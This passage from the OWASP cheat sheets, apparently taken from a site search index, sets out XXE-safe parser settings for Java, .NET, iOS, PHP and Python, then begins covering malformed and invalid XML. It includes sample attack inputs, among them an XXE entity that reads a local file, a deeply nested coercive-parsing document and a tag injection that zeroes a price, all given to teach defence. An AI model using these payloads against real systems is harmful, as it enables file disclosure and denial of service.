"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#schemafactory","title":"SchemaFactory","text":"

To protect a javax.xml.validation.SchemaFactory from XXE, do this:

SchemaFactory factory = SchemaFactory.newInstance(\"http://www.w3.org/2001/XMLSchema\");\nfactory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\nfactory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\");\nSchema schema = factory.newSchema(Source);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxtransformerfactory","title":"SAXTransformerFactory","text":"

To protect a javax.xml.transform.sax.SAXTransformerFactory from XXE, do this:

SAXTransformerFactory sf = SAXTransformerFactory.newInstance();\nsf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\nsf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, \"\");\nsf.newXMLFilter(Source);\n

Note: Use of the following XMLConstants requires JAXP 1.5, which was added to Java in 7u40 and Java 8:

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlreader","title":"XMLReader","text":"

To protect a Java org.xml.sax.XMLReader from XXE, do this:

XMLReader reader = XMLReaderFactory.createXMLReader();\nreader.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\n// This may not be strictly required as DTDs shouldn't be allowed at all, per previous line.\nreader.setFeature(\"http://apache.org/xml/features/nonvalidating/load-external-dtd\", false);\nreader.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);\nreader.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxreader","title":"SAXReader","text":"

To protect a Java org.dom4j.io.SAXReader from XXE, do this:

saxReader.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\nsaxReader.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);\nsaxReader.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);\n

Based on testing, if you are missing one of these, you can still be vulnerable to an XXE attack.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxbuilder","title":"SAXBuilder","text":"

To protect a Java org.jdom2.input.SAXBuilder from XXE, disallow DTDs (doctypes) entirely:

SAXBuilder builder = new SAXBuilder();\nbuilder.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\",true);\nDocument doc = builder.build(new File(fileName));\n

Alternatively, if DTDs can't be completely disabled, disable external entities and entity expansion:

SAXBuilder builder = new SAXBuilder();\nbuilder.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);\nbuilder.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);\nbuilder.setExpandEntities(false);\nDocument doc = builder.build(new File(fileName));\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#no-op-entityresolver","title":"No-op EntityResolver","text":"

For APIs that take an EntityResolver, you can neutralize an XML parser's ability to resolve entities by supplying a no-op implementation:

public final class NoOpEntityResolver implements EntityResolver {\npublic InputSource resolveEntity(String publicId, String systemId) {\nreturn new InputSource(new StringReader(\"\"));\n}\n}\n\n// ...\n\nxmlReader.setEntityResolver(new NoOpEntityResolver());\ndocumentBuilder.setEntityResolver(new NoOpEntityResolver());\n

or more simply:

EntityResolver noop = (publicId, systemId) -> new InputSource(new StringReader(\"\"));\nxmlReader.setEntityResolver(noop);\ndocumentBuilder.setEntityResolver(noop);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#jaxb-unmarshaller","title":"JAXB Unmarshaller","text":"

Since a javax.xml.bind.Unmarshaller parses XML and does not support any flags for disabling XXE, it's imperative to parse the untrusted XML through a configurable secure parser first, generate a source object as a result, and pass the source object to the Unmarshaller. For example:

SAXParserFactory spf = SAXParserFactory.newInstance();\n\n//Option 1: This is the PRIMARY defense against XXE\nspf.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\nspf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);\nspf.setXIncludeAware(false);\n\n//Option 2: If disabling doctypes is not possible\nspf.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);\nspf.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);\nspf.setFeature(\"http://apache.org/xml/features/nonvalidating/load-external-dtd\", false);\nspf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);\nspf.setXIncludeAware(false);\n\n//Do unmarshall operation\nSource xmlSource = new SAXSource(spf.newSAXParser().getXMLReader(),\nnew InputSource(new StringReader(xml)));\nJAXBContext jc = JAXBContext.newInstance(Object.class);\nUnmarshaller um = jc.createUnmarshaller();\num.unmarshal(xmlSource);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xpathexpression","title":"XPathExpression","text":"

A javax.xml.xpath.XPathExpression can not be configured securely by itself, so the untrusted data must be parsed through another securable XML parser first.

For example:

DocumentBuilderFactory df = DocumentBuilderFactory.newInstance();\ndf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\ndf.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\");\nDocumentBuilder builder = df.newDocumentBuilder();\nString result = new XPathExpression().evaluate( builder.parse(\nnew ByteArrayInputStream(xml.getBytes())) );\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#javabeansxmldecoder","title":"java.beans.XMLDecoder","text":"

The readObject() method in this class is fundamentally unsafe.

Not only is the XML it parses subject to XXE, but the method can be used to construct any Java object, and execute arbitrary code as described here.

And there is no way to make use of this class safe except to trust or properly validate the input being passed into it.

As such, we'd strongly recommend completely avoiding the use of this class and replacing it with a safe or properly configured XML parser as described elsewhere in this cheat sheet.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#other-xml-parsers","title":"Other XML Parsers","text":"

There are many third-party libraries that parse XML either directly or through their use of other libraries. Please test and verify their XML parser is secure against XXE by default. If the parser is not secure by default, look for flags supported by the parser to disable all possible external resource inclusions like the examples given above. If there's no control exposed to the outside, make sure the untrusted content is passed through a secure parser first and then passed to insecure third-party parser similar to how the Unmarshaller is secured.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#spring-framework-mvcoxm-xxe-vulnerabilities","title":"Spring Framework MVC/OXM XXE Vulnerabilities","text":"

For example, some XXE vulnerabilities were found in Spring OXM and Spring MVC. The following versions of the Spring Framework are vulnerable to XXE:

There were other issues as well that were fixed later, so to fully address these issues, Spring recommends you upgrade to Spring Framework 3.2.8+ or 4.0.2+.

For Spring OXM, this is referring to the use of org.springframework.oxm.jaxb.Jaxb2Marshaller. Note that the CVE for Spring OXM specifically indicates that 2 XML parsing situations are up to the developer to get right, and 2 are the responsibility of Spring and were fixed to address this CVE.

Here's what they say:

Two situations developers must handle:

The issue Spring fixed:

For SAXSource and StreamSource instances, Spring processed external entities by default thereby creating this vulnerability.

Here's an example of using a StreamSource that was vulnerable, but is now safe, if you are using a fixed version of Spring OXM or Spring MVC:

import org.springframework.oxm.Jaxb2Marshaller;\nimport org.springframework.oxm.jaxb.Jaxb2Marshaller;\n\nJaxb2Marshaller marshaller = new Jaxb2Marshaller();\n// Must cast return Object to whatever type you are unmarshalling\nmarshaller.unmarshal(new StreamSource(new StringReader(some_string_containing_XML));\n

So, per the Spring OXM CVE writeup, the above is now safe. But if you were to use a DOMSource or StAXSource instead, it would be up to you to configure those sources to be safe from XXE.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#castor","title":"Castor","text":"

Castor is a data binding framework for Java. It allows conversion between Java objects, XML, and relational tables. The XML features in Castor prior to version 1.3.3 are vulnerable to XXE, and should be upgraded to the latest version. For additional information, check the official XML configuration file

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#net","title":".NET","text":"

The following, up to date information for XXE injection in .NET is directly from this web application of unit tests by Dean Fleming. This web application covers all currently supported .NET XML parsers, and has test cases for each demonstrating when they are safe from XXE injection and when they are not, but tests are only with injection from file and not direct DTD (used by DoS attacks).

For DoS attacks using a direct DTD (such as the Billion laughs attack), a separate testing application from Josh Grossman at Bounce Security has been created to verify that .NET >=4.5.2 is safe from these attacks.

Previously, this information was based on some older articles which may not be 100% accurate including:

The following table lists all supported .NET XML parsers and their default safety levels. Note that in .NET Framework \u22654.5.2 in all cases if a DoS attempt is performed, an exception is thrown due to the expanded XML being too many characters.

Table explanation:

Attack Type .NET Framework Version XDocument (Linq to XML) XmlDictionaryReader XmlDocument XmlNodeReader XmlReader XmlTextReader XPathNavigator XslCompiledTransform External entity Attacks <4.5.2 \u2705 \u2705 \u274c \u2705 \u2705 \u274c \u274c \u2705 \u22654.5.2 \u2705 \u2705 \u2705 \u2705 \u2705 \u2705 \u2705 \u2705 Billion Laughs <4.5.2 \u2753 \u2705 \u274c \u2705 \u2705 \u274c \u274c \u2705 \u22654.5.2 \u2705 \u2705* \u2705 \u2705* \u2705* \u2705 \u2705 \u2705

* For .NET Framework Versions \u22654.5.2, these libraries won't even process the in-line DTD by default. Even if you change the default to allow processing a DTD, if a DoS attempt is performed an exception will still be thrown as documented above.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#linq-to-xml","title":"LINQ to XML","text":"

Both the XElement and XDocument objects in the System.Xml.Linq library are safe from XXE injection from external file and DoS attack by default. XElement parses only the elements within the XML file, so DTDs are ignored altogether. XDocument has XmlResolver disabled by default so it's safe from SSRF. Whilst DTDs are enabled by default, from Framework versions \u22654.5.2, it is not vulnerable to DoS as noted but it may be vulnerable in earlier Framework versions. For more information, see Microsoft's guidance on how to prevent XXE and XML Denial of Service in .NET

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmldictionaryreader","title":"XmlDictionaryReader","text":"

System.Xml.XmlDictionaryReader is safe by default, as when it attempts to parse the DTD, the compiler throws an exception saying that \"CData elements not valid at top level of an XML document\". It becomes unsafe if constructed with a different unsafe XML parser.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmldocument","title":"XmlDocument","text":"

Prior to .NET Framework version 4.5.2, System.Xml.XmlDocument is unsafe by default. The XmlDocument object has an XmlResolver object within it that needs to be set to null in versions prior to 4.5.2. In versions 4.5.2 and up, this XmlResolver is set to null by default.

The following example shows how it is made safe:

 static void LoadXML()\n{\nstring xxePayload = \"<!DOCTYPE doc [<!ENTITY win SYSTEM 'file:///C:/Users/testdata2.txt'>]>\"\n+ \"<doc>&win;</doc>\";\nstring xml = \"<?xml version='1.0' ?>\" + xxePayload;\n\nXmlDocument xmlDoc = new XmlDocument();\n// Setting this to NULL disables DTDs - Its NOT null by default.\nxmlDoc.XmlResolver = null;\nxmlDoc.LoadXml(xml);\nConsole.WriteLine(xmlDoc.InnerText);\nConsole.ReadLine();\n}\n

For .NET Framework version \u22654.5.2, this is safe by default.

XmlDocument can become unsafe if you create your own nonnull XmlResolver with default or unsafe settings. If you need to enable DTD processing, instructions on how to do so safely are described in detail in the referenced MSDN article.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlnodereader","title":"XmlNodeReader","text":"

System.Xml.XmlNodeReader objects are safe by default and will ignore DTDs even when constructed with an unsafe parser or wrapped in another unsafe parser.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlreader_1","title":"XmlReader","text":"

System.Xml.XmlReader objects are safe by default.

They are set by default to have their ProhibitDtd property set to false in .NET Framework versions 4.0 and earlier, or their DtdProcessing property set to Prohibit in .NET versions 4.0 and later.

Additionally, in .NET versions 4.5.2 and later, the XmlReaderSettings belonging to the XmlReader has its XmlResolver set to null by default, which provides an additional layer of safety.

Therefore, XmlReader objects will only become unsafe in version 4.5.2 and up if both the DtdProcessing property is set to Parse and the XmlReaderSetting's XmlResolver is set to a nonnull XmlResolver with default or unsafe settings. If you need to enable DTD processing, instructions on how to do so safely are described in detail in the referenced MSDN article.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmltextreader","title":"XmlTextReader","text":"

System.Xml.XmlTextReader is unsafe by default in .NET Framework versions prior to 4.5.2. Here is how to make it safe in various .NET versions:

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#prior-to-net-40","title":"Prior to .NET 4.0","text":"

In .NET Framework versions prior to 4.0, DTD parsing behavior for XmlReader objects like XmlTextReader are controlled by the Boolean ProhibitDtd property found in the System.Xml.XmlReaderSettings and System.Xml.XmlTextReader classes.

Set these values to true to disable inline DTDs completely.

XmlTextReader reader = new XmlTextReader(stream);\n// NEEDED because the default is FALSE!!\nreader.ProhibitDtd = true;  
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#net-40-net-452","title":".NET 4.0 - .NET 4.5.2","text":"

In .NET Framework version 4.0, DTD parsing behavior has been changed. The ProhibitDtd property has been deprecated in favor of the new DtdProcessing property.

However, they didn't change the default settings so XmlTextReader is still vulnerable to XXE by default.

Setting DtdProcessing to Prohibit causes the runtime to throw an exception if a <!DOCTYPE> element is present in the XML.

To set this value yourself, it looks like this:

XmlTextReader reader = new XmlTextReader(stream);\n// NEEDED because the default is Parse!!\nreader.DtdProcessing = DtdProcessing.Prohibit;  

Alternatively, you can set the DtdProcessing property to Ignore, which will not throw an exception on encountering a <!DOCTYPE> element but will simply skip over it and not process it. Finally, you can set DtdProcessing to Parse if you do want to allow and process inline DTDs.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#net-452-and-later","title":".NET 4.5.2 and later","text":"

In .NET Framework versions 4.5.2 and up, XmlTextReader's internal XmlResolver is set to null by default, making the XmlTextReader ignore DTDs by default. The XmlTextReader can become unsafe if you create your own nonnull XmlResolver with default or unsafe settings.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xpathnavigator","title":"XPathNavigator","text":"

System.Xml.XPath.XPathNavigator is unsafe by default in .NET Framework versions prior to 4.5.2.

This is due to the fact that it implements IXPathNavigable objects like XmlDocument, which are also unsafe by default in versions prior to 4.5.2.

You can make XPathNavigator safe by giving it a safe parser like XmlReader (which is safe by default) in the XPathDocument's constructor.

Here is an example:

XmlReader reader = XmlReader.Create(\"example.xml\");\nXPathDocument doc = new XPathDocument(reader);\nXPathNavigator nav = doc.CreateNavigator();\nstring xml = nav.InnerXml.ToString();\n

For .NET Framework version \u22654.5.2, XPathNavigator is safe by default.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xslcompiledtransform","title":"XslCompiledTransform","text":"

System.Xml.Xsl.XslCompiledTransform (an XML transformer) is safe by default as long as the parser it's given is safe.

It is safe by default because the default parser of the Transform() methods is an XmlReader, which is safe by default (per above).

The source code for this method is here.

Some of the Transform() methods accept an XmlReader or IXPathNavigable (e.g., XmlDocument) as an input, and if you pass in an unsafe XML Parser then the Transform will also be unsafe.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#ios","title":"iOS","text":""},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#libxml2_1","title":"libxml2","text":"

iOS includes the C/C++ libxml2 library described above, so that guidance applies if you are using libxml2 directly.

However, the version of libxml2 provided up through iOS6 is prior to version 2.9 of libxml2 (which protects against XXE by default).

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#nsxmldocument","title":"NSXMLDocument","text":"

iOS also provides an NSXMLDocument type, which is built on top of libxml2.

However, NSXMLDocument provides some additional protections against XXE that aren't available in libxml2 directly.

Per the 'NSXMLDocument External Entity Restriction API' section of this page:

However, to completely disable XXE in an NSXMLDocument in any version of iOS you simply specify NSXMLNodeLoadExternalEntitiesNever when creating the NSXMLDocument.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#php","title":"PHP","text":"

When using the default XML parser (based on libxml2), PHP 8.0 and newer prevent XXE by default.

For PHP versions prior to 8.0, per the PHP documentation, the following should be set when using the default PHP XML parser in order to prevent XXE:

libxml_set_external_entity_loader(null);\n

A description of how to abuse this in PHP is presented in a good SensePost article describing a cool PHP based XXE vulnerability that was fixed in Facebook.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#python","title":"Python","text":"

The Python 3 official documentation contains a section on xml vulnerabilities. As of the 1st January 2020 Python 2 is no longer supported, however the Python website still contains some legacy documentation.

The following table gives an overview of various modules in Python 3 used for XML parsing and whether or not they are vulnerable.

Attack Type sax etree minidom pulldom xmlrpc Billion Laughs Vulnerable Vulnerable Vulnerable Vulnerable Vulnerable Quadratic Blowup Vulnerable Vulnerable Vulnerable Vulnerable Vulnerable External Entity Expansion Safe Safe Safe Safe Safe DTD Retrieval Safe Safe Safe Safe Safe Decompression Bomb Safe Safe Safe Safe Vulnerable

To protect your application from the applicable attacks, two packages exist to help you sanitize your input and protect your application against DDoS and remote attacks.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#semgrep-rules","title":"Semgrep Rules","text":"

Semgrep is a command-line tool for offline static analysis. Use pre-built or custom rules to enforce code and security standards in your codebase.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#java_1","title":"Java","text":"

Below are the rules for different XML parsers in Java

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#digester","title":"Digester","text":"

Identifying XXE vulnerability in the org.apache.commons.digester3.Digester library Rule can be played here https://semgrep.dev/s/salecharohit:xxe-Digester

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#documentbuilderfactory","title":"DocumentBuilderFactory","text":"

Identifying XXE vulnerability in the javax.xml.parsers.DocumentBuilderFactory library Rule can be played here https://semgrep.dev/s/salecharohit:xxe-dbf

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxbuilder_1","title":"SAXBuilder","text":"

Identifying XXE vulnerability in the org.jdom2.input.SAXBuilder library Rule can be played here https://semgrep.dev/s/salecharohit:xxe-saxbuilder

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxparserfactory","title":"SAXParserFactory","text":"

Identifying XXE vulnerability in the javax.xml.parsers.SAXParserFactory library Rule can be played here https://semgrep.dev/s/salecharohit:xxe-SAXParserFactory

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxreader_1","title":"SAXReader","text":"

Identifying XXE vulnerability in the org.dom4j.io.SAXReader library Rule can be played here https://semgrep.dev/s/salecharohit:xxe-SAXReader

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlinputfactory","title":"XMLInputFactory","text":"

Identifying XXE vulnerability in the javax.xml.stream.XMLInputFactory library Rule can be played here https://semgrep.dev/s/salecharohit:xxe-XMLInputFactory

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlreader_2","title":"XMLReader","text":"

Identifying XXE vulnerability in the org.xml.sax.XMLReader library Rule can be played here https://semgrep.dev/s/salecharohit:xxe-XMLReader

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html","title":"XML Security Cheat Sheet","text":""},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#malformed-xml-documents","title":"Malformed XML Documents","text":"

The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.

The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#more-time-required","title":"More Time Required","text":"

A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS).

To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#applications-processing-malformed-data","title":"Applications Processing Malformed Data","text":"

Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document's noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.

The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#malformed-document-to-malformed-document","title":"Malformed Document to Malformed Document","text":"

According to the XML specification, the string -- (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:

<element>\n<!-- one\n  <!-- another comment\n comment -->\n</element>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#well-formed-document-to-well-formed-document-normalized","title":"Well-Formed Document to Well-Formed Document Normalized","text":"

Certain parsers may consider normalizing the contents of your CDATA sections. This means that they will update the special characters contained in the CDATA section to contain the safe versions of these characters even though is not required:

<element>\n<![CDATA[<script>a=1;</script>]]>\n</element>\n

Normalization of a CDATA section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:

<element>\n&lt;script&gt;a=1;&lt;/script&gt;\n</element>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#coercive-parsing","title":"Coercive Parsing","text":"

A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up -and eventually deplete- the machine's resources and cause a denial of service on the target. Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this:

<A1>\n<A2>\n<A3>\n...\n    <A30000>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#violation-of-xml-specification-rules","title":"Violation of XML Specification Rules","text":"

Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#invalid-xml-documents","title":"Invalid XML Documents","text":"

Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.

The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#document-without-schema","title":"Document without Schema","text":"

Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an id value related to an item and a certain price. The user may only introduce a certain id value using the web interface:

<buy>\n<id>123</id>\n<price>10</price>\n</buy>\n

If there is no control on the document's structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:

<buy>\n<id>123</id><price>0</price><id></id>\n<price>10</price>\n</buy>\n

Notice again how the value 123 is supplied as an id, but now the document includes additional opening and closing tags. The attacker closed the id element and sets a bogus price element to the value 0. The final step to keep the structure well-formed is to add one empty id element. After this, the application adds the closing tag for id and set the price to 10. If the application processes only the first values provided for the ID and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#unrestrictive-schema","title":"Unrestrictive Schema","text":"

Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person's age is validated against an inline DTD schema:

<!DOCTYPE person [\n <!ELEMENT person (name, age)>\n<!ELEMENT name (#PCDATA)>\n<!ELEMENT age (#PCDATA)>\n]>\n<person>\n<name>John Doe</name>\n<age>11111..(1.000.000digits)..11111</age>\n</person>\n

The previous document contains an inline DTD with a root element named person. This element contains two elements in a specific order: name and then age. The element name is then defined to contain PCDATA as well as the element age. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the age element contains one million digits. Since there are no restrictions on the maximum size for the age element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign). If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element name or a valid range for the element age), this type of schema increases the risk of affecting the integrity and availability of resources.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#improper-data-validation","title":"Improper Data Validation","text":"

When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application's functionality with unexpected values.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#string-data-types","title":"String Data Types","text":"

Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption some values must be encoded using base64 . This is the schema definition of how these values should look:

<element name=\"CipherData\" type=\"xenc:CipherDataType\"/>\n<complexType name=\"CipherDataType\">\n<choice>\n<element name=\"CipherValue\" type=\"base64Binary\"/>\n<element ref=\"xenc:CipherReference\"/>\n</choice>\n</complexType>\n

The previous schema defines the element CipherValue as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the CipherData element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#numeric-data-types","title":"Numeric Data Types","text":"

Defining the correct data type for numbers can be more complex since there are more options than there are for strings.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#negative-and-positive-restrictions","title":"Negative and Positive Restrictions","text":"

XML Schema numeric data types can include different ranges of numbers. They could include:

The following sample document defines an id for a product, a price, and a quantity value that is under the control of an attacker:

<buy>\n<id>1</id>\n<price>10</price>\n<quantity>1</quantity>\n</buy>\n

To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:

<xs:schema xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">\n<xs:element name=\"buy\">\n<xs:complexType>\n<xs:sequence>\n<xs:element name=\"id\" type=\"xs:integer\"/>\n<xs:element name=\"price\" type=\"xs:decimal\"/>\n<xs:element name=\"quantity\" type=\"xs:integer\"/>\n</xs:sequence>\n</xs:complexType>\n</xs:element>\n</xs:schema>\n

Limiting that quantity to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing price*quantity. However, since this data type may allow negative values, it might allow a negative result on the user's account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#divide-by-zero","title":"Divide by Zero","text":"

Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error FOAR0001 will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type positiveInteger for the element.

<xs:element name=\"denominator\">\n<xs:simpleType>\n<xs:restriction base=\"xs:positiveInteger\"/>\n</xs:simpleType>\n</xs:element>\n

The element denominator is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#special-values-infinity-and-not-a-number-nan","title":"Special Values: Infinity and Not a Number (NaN)","text":"

The data types float and double contain real numbers and some special values: -Infinity or -INF, NaN, and +Infinity or INF. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies. Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values Infinity and NaN are not required and only real numbers are expected, the data type decimal is recommended:

